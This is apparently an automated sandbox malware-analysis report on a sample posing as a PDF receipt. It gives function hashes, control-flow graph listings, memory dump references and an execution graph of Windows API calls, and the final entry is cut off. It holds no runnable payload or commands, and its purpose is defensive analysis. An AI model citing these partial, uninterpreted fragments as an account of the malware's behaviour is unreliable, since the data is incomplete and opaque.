                                                                                                                • Instruction Fuzzy Hash: 77511674D2521ACFCF08DFA6E4405EEFBF2EF89201F10942AC415B6264D37896458F6A
                                                                                                                Function 08274EAB Relevance: .1, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dc86d01cb89521b8582db33c9a6c84f69bf1cb81ef2fbc5438fa0147db34f1d7
                                                                                                                • Instruction ID: 9fd4cd788fc59d0be1f0d5c16e33314dce59a113cec15a74565ec3217fffc5e2
                                                                                                                • Opcode Fuzzy Hash: dc86d01cb89521b8582db33c9a6c84f69bf1cb81ef2fbc5438fa0147db34f1d7
                                                                                                                • Instruction Fuzzy Hash: 0C512874D2521ACFCF08DFA6D4405EEFBF1EF89301F14942AC415B6264D37896468F5A
                                                                                                                Function 082735E8 Relevance: .1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 406fcc749d7b05be296d471655cf16e3f960b71650ccd1f5faa8f77b3caf5bb5
                                                                                                                • Instruction ID: bbe0ae467a30ba0dcdaaa277b1bbec4490eaafdfcf505b188415de7df1d0ef91
                                                                                                                • Opcode Fuzzy Hash: 406fcc749d7b05be296d471655cf16e3f960b71650ccd1f5faa8f77b3caf5bb5
                                                                                                                • Instruction Fuzzy Hash: BC4108B0E1520A9FCB48CFAAC5816AEFBF2BF88310F64C06AC415A7354D7749A418F94
                                                                                                                Function 082735F8 Relevance: .1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a094e873b8fe9ef3fe9b06efa96489dd6894f628edeb7072ff18bc906bcc631
                                                                                                                • Instruction ID: d00a278c43c4fbcd3223e66d38ace89e117fcb62c74d36b4a44f321c9c0cb00f
                                                                                                                • Opcode Fuzzy Hash: 9a094e873b8fe9ef3fe9b06efa96489dd6894f628edeb7072ff18bc906bcc631
                                                                                                                • Instruction Fuzzy Hash: 4041F6B0D2560ADFCB48CFAAC5855AEFBF2BB88311F64C02AC415A7354D7749A41CF94

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:9.6%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:77
                                                                                                                Total number of Limit Nodes:3
                                                                                                                execution_graph 30989 6d19078 30990 6d190c6 EnumThreadWindows 30989->30990 30991 6d190bc 30989->30991 30992 6d190f8 30990->30992 30991->30990 30993 6d19408 30994 6d1944d MessageBoxW 30993->30994 30996 6d19494 30994->30996 30997 147e018 30998 147e024 30997->30998 30999 147e0ae 30998->30999 31001 6d11702 30998->31001 31002 6d11713 31001->31002 31008 6d11780 31002->31008 31012 6d1181d 31002->31012 31016 6d1177b 31002->31016 31020 6d118e3 31002->31020 31003 6d11743 31003->30999 31009 6d117ad 31008->31009 31024 6d15ee2 31009->31024 31013 6d11824 31012->31013 31015 6d15ee2 2 API calls 31013->31015 31014 6d1199f 31014->31003 31015->31014 31017 6d117ad 31016->31017 31019 6d15ee2 2 API calls 31017->31019 31018 6d1199f 31018->31003 31019->31018 31021 6d118ea 31020->31021 31023 6d15ee2 2 API calls 31021->31023 31022 6d1199f 31022->31003 31023->31022 31025 6d15f04 31024->31025 31027 6d1607b 31024->31027 31025->31027 31033 6d16b70 31025->31033 31037 6d16b60 31025->31037 31041 6d16b98 31025->31041 31026 6d16027 31045 6d19540 31026->31045 31050 6d1953a 31026->31050 31034 6d16b79 31033->31034 31055 6d168e4 31034->31055 31038 6d16b79 31037->31038 31039 6d168e4 2 API calls 31038->31039 31040 6d16b84 31039->31040 31040->31026 31042 6d16ba8 31041->31042 31043 6d16bc5 31042->31043 31073 6d168f4 31042->31073 31043->31026 31046 6d16b98 DuplicateHandle 31045->31046 31047 6d19548 31046->31047 31088 6d17bf4 31047->31088 31051 6d19548 31050->31051 31052 6d16b98 DuplicateHandle 31050->31052 31053 6d17bf4 2 API calls 31051->31053 31052->31051 31054 6d19553 31053->31054 31054->31027 31056 6d168ef 31055->31056 31059 6d17a10 31056->31059 31061 6d17a1b 31059->31061 31060 6d17d7a 31061->31060 31062 6d16b98 DuplicateHandle 31061->31062 31063 6d17e73 31062->31063 31066 6d17af4 31063->31066 31065 6d17e7c 31067 6d17aff 31066->31067 31069 6d18193 31067->31069 31070 6d17b10 31067->31070 31069->31065 31071 6d181c8 OleInitialize 31070->31071 31072 6d1822c 31071->31072 31072->31069 31074 6d168ff 31073->31074 31078 6d17330 31074->31078 31081 6d1732b 31074->31081 31075 6d17283 31075->31043 31085 6d16f9c 31078->31085 31082 6d17330 31081->31082 31083 6d16f9c DuplicateHandle 31082->31083 31084 6d1735e 31083->31084 31084->31075 31086 6d17398 DuplicateHandle 31085->31086 31087 6d1735e 31086->31087 31087->31075 31089 6d17bff 31088->31089 31090 6d17a10 2 API calls 31089->31090 31091 6d195a2 31090->31091

                                                                                                                Executed Functions

                                                                                                                Function 0147C147 Relevance: 6.5, Strings: 5, Instructions: 229COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 251 147c147-147c158 252 147c184 251->252 253 147c15a-147c172 251->253 254 147c186-147c187 252->254 258 147c174-147c179 253->258 259 147c17b-147c17e 253->259 256 147c188-147c18a 254->256 258->254 260 147c180-147c182 259->260 261 147c18b 259->261 260->252 260->253 262 147c18c-147c199 261->262 262->252 263 147c19b-147c19d 262->263 263->256 264 147c19f-147c1a1 263->264 264->262 265 147c1a3-147c1c8 264->265 266 147c1cf-147c2ac call 14741a0 call 1473cc0 265->266 267 147c1ca 265->267 277 147c2b3-147c2d4 call 1475658 266->277 278 147c2ae 266->278 267->266 280 147c2d9-147c2e4 277->280 278->277 281 147c2e6 280->281 282 147c2eb-147c2ef 280->282 281->282 283 147c2f4-147c2fb 282->283 284 147c2f1-147c2f2 282->284 286 147c302-147c310 283->286 287 147c2fd 283->287 285 147c313-147c357 284->285 291 147c3bd-147c3d4 285->291 286->285 287->286 293 147c3d6-147c3fb 291->293 294 147c359-147c36f 291->294 300 147c413 293->300 301 147c3fd-147c412 293->301 298 147c371-147c37d 294->298 299 147c399 294->299 302 147c387-147c38d 298->302 303 147c37f-147c385 298->303 304 147c39f-147c3bc 299->304 301->300 305 147c397 302->305 303->305 304->291 305->304
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: 149fdcb2351c66792b166adf7605c79dd1df78efe3d08caa8e9ee340af6be9be
                                                                                                                • Instruction ID: b1fff036c0fce4f120501ccb5c3eadca7c07ca3ed46c811c180fdbd7726b0c7e
                                                                                                                • Opcode Fuzzy Hash: 149fdcb2351c66792b166adf7605c79dd1df78efe3d08caa8e9ee340af6be9be
                                                                                                                • Instruction Fuzzy Hash: B3A1B374E00219DFDB14DFAAD884A9DBBF2FF89310F14806AE409AB365DB359941CF50
                                                                                                                Function 01475370 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 309 1475370-14753a0 310 14753a7-1475484 call 14741a0 call 1473cc0 309->310 311 14753a2 309->311 321 1475486 310->321 322 147548b-14754a9 310->322 311->310 321->322 352 14754ac call 1475649 322->352 353 14754ac call 1475658 322->353 323 14754b2-14754bd 324 14754c4-14754c8 323->324 325 14754bf 323->325 326 14754cd-14754d4 324->326 327 14754ca-14754cb 324->327 325->324 329 14754d6 326->329 330 14754db-14754e9 326->330 328 14754ec-1475530 327->328 334 1475596-14755ad 328->334 329->330 330->328 336 1475532-1475548 334->336 337 14755af-14755d4 334->337 341 1475572 336->341 342 147554a-1475556 336->342 343 14755d6-14755eb 337->343 344 14755ec 337->344 347 1475578-1475595 341->347 345 1475560-1475566 342->345 346 1475558-147555e 342->346 343->344 348 1475570 345->348 346->348 347->334 348->347 352->323 353->323
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: 6f1ed3edb68a62d009aa542c4a2a91db5cf99bad8d509a12f4cbf85506c751c5
                                                                                                                • Instruction ID: 1d1aa6d4211cc58ee019a41b5e64c2a909728bcd9c9f90b506752bd3290f8762
                                                                                                                • Opcode Fuzzy Hash: 6f1ed3edb68a62d009aa542c4a2a91db5cf99bad8d509a12f4cbf85506c751c5
                                                                                                                • Instruction Fuzzy Hash: 1D81B374E01218DFDB14DFAAD984A9DBBF2BF88310F14C06AE809AB365DB349945CF50
                                                                                                                Function 0147C738 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 354 147c738-147c768 355 147c76f-147c84c call 14741a0 call 1473cc0 354->355 356 147c76a 354->356 366 147c853-147c874 call 1475658 355->366 367 147c84e 355->367 356->355 369 147c879-147c884 366->369 367->366 370 147c886 369->370 371 147c88b-147c88f 369->371 370->371 372 147c894-147c89b 371->372 373 147c891-147c892 371->373 375 147c8a2-147c8b0 372->375 376 147c89d 372->376 374 147c8b3-147c8f7 373->374 380 147c95d-147c974 374->380 375->374 376->375 382 147c976-147c99b 380->382 383 147c8f9-147c90f 380->383 390 147c9b3 382->390 391 147c99d-147c9b2 382->391 387 147c911-147c91d 383->387 388 147c939 383->388 392 147c927-147c92d 387->392 393 147c91f-147c925 387->393 389 147c93f-147c95c 388->389 389->380 391->390 394 147c937 392->394 393->394 394->389
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: e66be730ba5859477f29d6c1d46f9a80eb1419842980d4e1b38369079e093564
                                                                                                                • Instruction ID: 51658e198a654cd68deba7ba64266e4934ed7ad22d744ceac88ac3558f9ea28e
                                                                                                                • Opcode Fuzzy Hash: e66be730ba5859477f29d6c1d46f9a80eb1419842980d4e1b38369079e093564
                                                                                                                • Instruction Fuzzy Hash: 5081B374E00219DFDB54DFAAD984A9DBBF2BF88310F14C06AE819AB365DB349941CF50
                                                                                                                Function 0147CFA9 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 398 147cfa9-147cfd8 399 147cfdf-147d0bc call 14741a0 call 1473cc0 398->399 400 147cfda 398->400 410 147d0c3-147d0e4 call 1475658 399->410 411 147d0be 399->411 400->399 413 147d0e9-147d0f4 410->413 411->410 414 147d0f6 413->414 415 147d0fb-147d0ff 413->415 414->415 416 147d104-147d10b 415->416 417 147d101-147d102 415->417 419 147d112-147d120 416->419 420 147d10d 416->420 418 147d123-147d167 417->418 424 147d1cd-147d1e4 418->424 419->418 420->419 426 147d1e6-147d20b 424->426 427 147d169-147d17f 424->427 433 147d223 426->433 434 147d20d-147d222 426->434 431 147d181-147d18d 427->431 432 147d1a9 427->432 435 147d197-147d19d 431->435 436 147d18f-147d195 431->436 437 147d1af-147d1cc 432->437 434->433 438 147d1a7 435->438 436->438 437->424 438->437
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: 58e6c94c3c92f8f02421bd441a939f3a85e1431e5837f55fa9f07706a2c5ae3f
                                                                                                                • Instruction ID: 6389b9db601c68f70fff56bc6c88bfe0aa09dee2564531f5b08aec3b91cd67db
                                                                                                                • Opcode Fuzzy Hash: 58e6c94c3c92f8f02421bd441a939f3a85e1431e5837f55fa9f07706a2c5ae3f
                                                                                                                • Instruction Fuzzy Hash: 0F81A274E11218DFDB14DFAAD984A9DBBF2FF89310F14806AE809AB365DB349945CF10
                                                                                                                Function 0147CCDF Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 442 147ccdf-147cd08 443 147cd0f-147cdec call 14741a0 call 1473cc0 442->443 444 147cd0a 442->444 454 147cdf3-147ce14 call 1475658 443->454 455 147cdee 443->455 444->443 457 147ce19-147ce24 454->457 455->454 458 147ce26 457->458 459 147ce2b-147ce2f 457->459 458->459 460 147ce34-147ce3b 459->460 461 147ce31-147ce32 459->461 463 147ce42-147ce50 460->463 464 147ce3d 460->464 462 147ce53-147ce97 461->462 468 147cefd-147cf14 462->468 463->462 464->463 470 147cf16-147cf3b 468->470 471 147ce99-147ceaf 468->471 477 147cf53 470->477 478 147cf3d-147cf52 470->478 475 147ceb1-147cebd 471->475 476 147ced9 471->476 479 147cec7-147cecd 475->479 480 147cebf-147cec5 475->480 481 147cedf-147cefc 476->481 478->477 482 147ced7 479->482 480->482 481->468 482->481
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: d95f375a9b087c42be9622dd2547dfeee7551b7b4885533ea4e48f9638ecf097
                                                                                                                • Instruction ID: efb88554758d55b86cfcdfff50a814024e1ddf4d2b25bd3a918deb70251a45ef
                                                                                                                • Opcode Fuzzy Hash: d95f375a9b087c42be9622dd2547dfeee7551b7b4885533ea4e48f9638ecf097
                                                                                                                • Instruction Fuzzy Hash: 3381D374E00219CFDB18DFAAD984A9DBBF2BF88310F14C46AE419AB365DB349941CF50
                                                                                                                Function 0147D27F Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 530 147d27f-147d2a8 531 147d2af-147d38c call 14741a0 call 1473cc0 530->531 532 147d2aa 530->532 542 147d393-147d3b4 call 1475658 531->542 543 147d38e 531->543 532->531 545 147d3b9-147d3c4 542->545 543->542 546 147d3c6 545->546 547 147d3cb-147d3cf 545->547 546->547 548 147d3d4-147d3db 547->548 549 147d3d1-147d3d2 547->549 551 147d3e2-147d3f0 548->551 552 147d3dd 548->552 550 147d3f3-147d437 549->550 556 147d49d-147d4b4 550->556 551->550 552->551 558 147d4b6-147d4db 556->558 559 147d439-147d44f 556->559 565 147d4f3 558->565 566 147d4dd-147d4f2 558->566 563 147d451-147d45d 559->563 564 147d479 559->564 567 147d467-147d46d 563->567 568 147d45f-147d465 563->568 569 147d47f-147d49c 564->569 566->565 570 147d477 567->570 568->570 569->556 570->569
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: a0b444d2123b9c963fd2ee2845c3db23e3562bc9991758edb328a9f163be596e
                                                                                                                • Instruction ID: 0bb958b7f205d89186d8f67080e3ad6af51d11b1495caffe20681e6ff9034367
                                                                                                                • Opcode Fuzzy Hash: a0b444d2123b9c963fd2ee2845c3db23e3562bc9991758edb328a9f163be596e
                                                                                                                • Instruction Fuzzy Hash: 2C81A274E11218DFDB14DFAAD984ADDBBF2BF88310F14806AD409AB365DB34A945CF50
                                                                                                                Function 0147CA0F Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 486 147ca0f-147ca38 487 147ca3f-147cb1c call 14741a0 call 1473cc0 486->487 488 147ca3a 486->488 498 147cb23-147cb44 call 1475658 487->498 499 147cb1e 487->499 488->487 501 147cb49-147cb54 498->501 499->498 502 147cb56 501->502 503 147cb5b-147cb5f 501->503 502->503 504 147cb64-147cb6b 503->504 505 147cb61-147cb62 503->505 507 147cb72-147cb80 504->507 508 147cb6d 504->508 506 147cb83-147cbc7 505->506 512 147cc2d-147cc44 506->512 507->506 508->507 514 147cc46-147cc6b 512->514 515 147cbc9-147cbdf 512->515 521 147cc83 514->521 522 147cc6d-147cc82 514->522 519 147cbe1-147cbed 515->519 520 147cc09 515->520 523 147cbf7-147cbfd 519->523 524 147cbef-147cbf5 519->524 525 147cc0f-147cc2c 520->525 522->521 526 147cc07 523->526 524->526 525->512 526->525
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: bc1de19b77bd8ab499658ced02509df8df910acf76cc154eaeccfe5d875de0d6
                                                                                                                • Instruction ID: be8b6ec2cfcbc6b53e2941be9427a0ea537ce0a5512b8e1549bbc30359db54e9
                                                                                                                • Opcode Fuzzy Hash: bc1de19b77bd8ab499658ced02509df8df910acf76cc154eaeccfe5d875de0d6
                                                                                                                • Instruction Fuzzy Hash: 5381A574E00219DFDB14DFAAD984A9DBBF2BF88310F14C06AE819AB365DB349945CF50
                                                                                                                Function 0147C473 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 574 147c473-147c498 575 147c49f-147c57c call 14741a0 call 1473cc0 574->575 576 147c49a 574->576 586 147c583-147c5a4 call 1475658 575->586 587 147c57e 575->587 576->575 589 147c5a9-147c5b4 586->589 587->586 590 147c5b6 589->590 591 147c5bb-147c5bf 589->591 590->591 592 147c5c4-147c5cb 591->592 593 147c5c1-147c5c2 591->593 595 147c5d2-147c5e0 592->595 596 147c5cd 592->596 594 147c5e3-147c627 593->594 600 147c68d-147c6a4 594->600 595->594 596->595 602 147c6a6-147c6cb 600->602 603 147c629-147c63f 600->603 609 147c6e3 602->609 610 147c6cd-147c6e2 602->610 607 147c641-147c64d 603->607 608 147c669 603->608 611 147c657-147c65d 607->611 612 147c64f-147c655 607->612 613 147c66f-147c68c 608->613 610->609 614 147c667 611->614 612->614 613->600 614->613
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                                • API String ID: 0-1229222154
                                                                                                                • Opcode ID: 48fdc1330c7898f10aa1966e7c250ad7f9cab98e9c2bee4265e92e56dc665c2d
                                                                                                                • Instruction ID: aa57483cc4524aecfb813842c1306df68322fea423e6d3a30b0b71bc689d963d
                                                                                                                • Opcode Fuzzy Hash: 48fdc1330c7898f10aa1966e7c250ad7f9cab98e9c2bee4265e92e56dc665c2d
                                                                                                                • Instruction Fuzzy Hash: CE81C574E00219DFDB14DFAAD984A9DBBF2BF88300F14D16AE419AB365DB349941CF50
                                                                                                                Function 01476FC8 Relevance: 5.4, Strings: 4, Instructions: 450COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 618 1476fc8-1476ffe 619 1477006-147700c 618->619 755 1477000 call 1476fc7 618->755 756 1477000 call 1476fc8 618->756 757 1477000 call 1477118 618->757 620 147700e-1477012 619->620 621 147705c-1477060 619->621 624 1477014-1477019 620->624 625 1477021-1477028 620->625 622 1477077-147708b 621->622 623 1477062-1477071 621->623 628 1477093-147709a 622->628 753 147708d call 147a0f7 622->753 754 147708d call 147a0f8 622->754 626 1477073-1477075 623->626 627 147709d-14770a7 623->627 624->625 629 14770fe-147713b 625->629 630 147702e-1477035 625->630 626->628 632 14770b1-14770b5 627->632 633 14770a9-14770af 627->633 639 1477146-1477166 629->639 640 147713d-1477143 629->640 630->621 631 1477037-147703b 630->631 634 147703d-1477042 631->634 635 147704a-1477051 631->635 636 14770bd-14770f7 632->636 638 14770b7 632->638 633->636 634->635 635->629 641 1477057-147705a 635->641 636->629 638->636 646 147716d-1477174 639->646 647 1477168 639->647 640->639 641->628 649 1477176-1477181 646->649 650 14774fc-1477505 647->650 651 1477187-147719a 649->651 652 147750d-1477519 649->652 657 14771b0-14771cb 651->657 658 147719c-14771aa 651->658 659 1477562-1477569 652->659 660 147751b-1477521 652->660 668 14771ef-14771f2 657->668 669 14771cd-14771d3 657->669 658->657 667 1477484-147748b 658->667 662 147756a 659->662 661 1477523-1477536 660->661 660->662 661->659 665 1477539-1477549 661->665 679 1477552-1477556 665->679 680 147754b-1477550 665->680 667->650 675 147748d-147748f 667->675 670 147734c-1477352 668->670 671 14771f8-14771fb 668->671 673 14771d5 669->673 674 14771dc-14771df 669->674 676 147743e-1477441 670->676 677 1477358-147735d 670->677 671->670 678 1477201-1477207 671->678 673->670 673->674 673->676 681 1477212-1477218 673->681 674->681 682 14771e1-14771e4 674->682 683 1477491-1477496 675->683 684 147749e-14774a4 675->684 687 1477447-147744d 676->687 688 1477508 676->688 677->676 678->670 686 147720d 678->686 691 147755c-147755d 679->691 680->691 689 147721e-1477220 681->689 690 147721a-147721c 681->690 692 147727e-1477284 682->692 693 14771ea 682->693 683->684 684->652 685 14774a6-14774ab 684->685 694 14774f0-14774f3 685->694 695 14774ad-14774b2 685->695 686->676 697 1477472-1477476 687->697 698 147744f-1477457 687->698 688->652 699 147722a-1477233 689->699 690->699 692->676 696 147728a-1477290 692->696 693->676 694->688 707 14774f5-14774fa 694->707 695->688 700 14774b4 695->700 701 1477296-1477298 696->701 702 1477292-1477294 696->702 697->667 706 1477478-147747e 697->706 698->652 703 147745d-147746c 698->703 704 1477246-147726e 699->704 705 1477235-1477240 699->705 708 14774bb-14774c0 700->708 709 14772a2-14772b9 701->709 702->709 703->657 703->697 727 1477274-1477279 704->727 728 1477362-1477398 704->728 705->676 705->704 706->649 706->667 707->650 707->675 710 14774e2-14774e4 708->710 711 14774c2-14774c4 708->711 720 14772e4-147730b 709->720 721 14772bb-14772d4 709->721 710->688 718 14774e6-14774e9 710->718 715 14774c6-14774cb 711->715 716 14774d3-14774d9 711->716 715->716 716->652 719 14774db-14774e0 716->719 718->694 719->710 723 14774b6-14774b9 719->723 720->688 733 1477311-1477314 720->733 721->728 731 14772da-14772df 721->731 723->688 723->708 727->728 734 14773a5-14773ad 728->734 735 147739a-147739e 728->735 731->728 733->688 736 147731a-1477343 733->736 734->688 739 14773b3-14773b8 734->739 737 14773a0-14773a3 735->737 738 14773bd-14773c1 735->738 736->728 751 1477345-147734a 736->751 737->734 737->738 740 14773c3-14773c9 738->740 741 14773e0-14773e4 738->741 739->676 740->741 743 14773cb-14773d3 740->743 744 14773e6-14773ec 741->744 745 14773ee-147740d call 14776f8 741->745 743->688 746 14773d9-14773de 743->746 744->745 748 1477413-1477417 744->748 745->748 746->676 748->676 749 1477419-1477435 748->749 749->676 751->728 753->628 754->628 755->619 756->619 757->619
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o]q$(o]q$,aq$,aq
                                                                                                                • API String ID: 0-1947289240
                                                                                                                • Opcode ID: 75b66a37386f1df80164580b52a8d6823a622cc77a3b32f25eac6db122ebd3f1
                                                                                                                • Instruction ID: ad409cfaa7b4bdbab3ea3c85fd1caa73a85a8d8e5701b2c4adabce907d0bb57a
                                                                                                                • Opcode Fuzzy Hash: 75b66a37386f1df80164580b52a8d6823a622cc77a3b32f25eac6db122ebd3f1
                                                                                                                • Instruction Fuzzy Hash: 09024B70A00249DFDB15CF68C888AEEBBB2FF48311F95846AE905AB375D734D941CB51
                                                                                                                Function 014729EC Relevance: 5.3, Strings: 4, Instructions: 337COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
